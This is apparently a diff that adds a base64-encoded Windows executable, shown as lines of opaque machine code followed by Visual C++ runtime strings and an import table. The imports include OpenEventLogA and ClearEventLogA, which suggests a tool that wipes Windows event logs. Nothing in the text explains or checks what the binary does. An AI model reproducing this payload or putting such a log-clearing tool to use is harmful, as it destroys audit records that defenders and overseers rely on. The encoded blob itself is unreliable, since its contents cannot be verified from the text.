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
+AAA4WAAATlgAAF5YAABuWAAAgFgAAJJYAACiWAAAAAAAAAAAAAD/////zhZAAOIWQAAGAAAGAAEA
+ABAAAwYABgIQBEVFRQUFBQUFNTAAUAAAAAAgKDhQWAcIADcwMFdQBwAAICAIAAAAAAhgaGBgYGAA
+AHBweHh4eAgHCAAABwAICAgAAAgACAAHCAAAACgAbgB1AGwAbAApAAAAAAAobnVsbCkAAHJ1bnRp
+bWUgZXJyb3IgAAANCgAAVExPU1MgZXJyb3INCgAAAFNJTkcgZXJyb3INCgAAAABET01BSU4gZXJy
+b3INCgAAUjYwMjgNCi0gdW5hYmxlIHRvIGluaXRpYWxpemUgaGVhcA0KAAAAAFI2MDI3DQotIG5v
+dCBlbm91Z2ggc3BhY2UgZm9yIGxvd2lvIGluaXRpYWxpemF0aW9uDQoAAAAAUjYwMjYNCi0gbm90
+IGVub3VnaCBzcGFjZSBmb3Igc3RkaW8gaW5pdGlhbGl6YXRpb24NCgAAAABSNjAyNQ0KLSBwdXJl
+IHZpcnR1YWwgZnVuY3Rpb24gY2FsbA0KAAAAUjYwMjQNCi0gbm90IGVub3VnaCBzcGFjZSBmb3Ig
+X29uZXhpdC9hdGV4aXQgdGFibGUNCgAAAABSNjAxOQ0KLSB1bmFibGUgdG8gb3BlbiBjb25zb2xl
+IGRldmljZQ0KAAAAAFI2MDE4DQotIHVuZXhwZWN0ZWQgaGVhcCBlcnJvcg0KAAAAAFI2MDE3DQot
+IHVuZXhwZWN0ZWQgbXVsdGl0aHJlYWQgbG9jayBlcnJvcg0KAAAAAFI2MDE2DQotIG5vdCBlbm91
+Z2ggc3BhY2UgZm9yIHRocmVhZCBkYXRhDQoADQphYm5vcm1hbCBwcm9ncmFtIHRlcm1pbmF0aW9u
+DQoAAAAAUjYwMDkNCi0gbm90IGVub3VnaCBzcGFjZSBmb3IgZW52aXJvbm1lbnQNCgBSNjAwOA0K
+LSBub3QgZW5vdWdoIHNwYWNlIGZvciBhcmd1bWVudHMNCgAAAFI2MDAyDQotIGZsb2F0aW5nIHBv
+aW50IG5vdCBsb2FkZWQNCgAAAABNaWNyb3NvZnQgVmlzdWFsIEMrKyBSdW50aW1lIExpYnJhcnkA
+AAAACgoAAFJ1bnRpbWUgRXJyb3IhCgpQcm9ncmFtOiAAAAAuLi4APHByb2dyYW0gbmFtZSB1bmtu
+b3duPgAAR2V0TGFzdEFjdGl2ZVBvcHVwAABHZXRBY3RpdmVXaW5kb3cATWVzc2FnZUJveEEAdXNl
+cjMyLmRsbAAAAAAAAAAAAAAAAAAA//////5GQAACR0AA/////7JHQAC2R0AA/////zZJQAA6SUAA
+6FQAAAAAAAAAAAAAwlUAABBQAADYVAAAAAAAAAAAAAACVgAAAFAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAA8lUAAOBVAADQVQAAAAAAALJVAACgVQAAVlcAABBWAAAeVgAAMlYAAEZWAABYVgAAZlYAAIJW
+AACYVgAAslYAAMxWAADiVgAA+lYAABRXAAAmVwAANlcAAERXAACUVQAAZFcAAHJXAACAVwAAjFcA
+AJhXAACkVwAAsFcAALxXAADGVwAA0lcAAOJXAADwVwAAAlgAABJYAAAmWAAAOFgAAE5YAABeWAAA
+blgAAIBYAACSWAAAolgAAAAAAADMAUxvY2FsRnJlZQCvAEZvcm1hdE1lc3NhZ2VBAAAaAUdldExh
+c3RFcnJvcgAAS0VSTkVMMzIuZGxsAAAyAENsb3NlRXZlbnRMb2cAMABDbGVhckV2ZW50TG9nQQAA
+QAFPcGVuRXZlbnRMb2dBAEFEVkFQSTMyLmRsbAAAfQBFeGl0UHJvY2VzcwCeAlRlcm1pbmF0ZVBy
+b2Nlc3MAAPcAR2V0Q3VycmVudFByb2Nlc3MAygBHZXRDb21tYW5kTGluZUEAdAFHZXRWZXJzaW9u
